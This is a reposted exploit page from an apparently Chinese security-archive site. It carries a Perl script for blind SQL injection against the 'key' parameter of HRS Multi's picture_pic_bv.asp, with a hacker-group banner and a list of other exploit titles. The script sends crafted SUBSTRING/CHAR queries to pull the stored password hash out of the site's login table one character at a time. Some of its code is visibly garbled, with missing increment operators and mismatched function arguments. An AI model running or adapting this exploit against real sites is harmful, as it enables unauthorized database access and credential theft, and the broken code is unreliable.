HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit

所属分类：网络安全 / Exploit 阅读数： 103

收藏 0赞 0分享

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # HRS Multi Blind SQL Injection Exploit #\n";
print " # (picture_pic_bv.asp key ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # PRODUCT SITE: http://www.softacid.net/ #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid key value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $key = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"d"})
{
$key = $options{"d"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $key, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $key, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $key = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host."picture_pic_bv.asp?key=".$key." and (SUBSTRING((SELECT password FROM login LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}

更多精彩内容其他人还在看

HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit

HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit

Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

网络赚钱

站长故事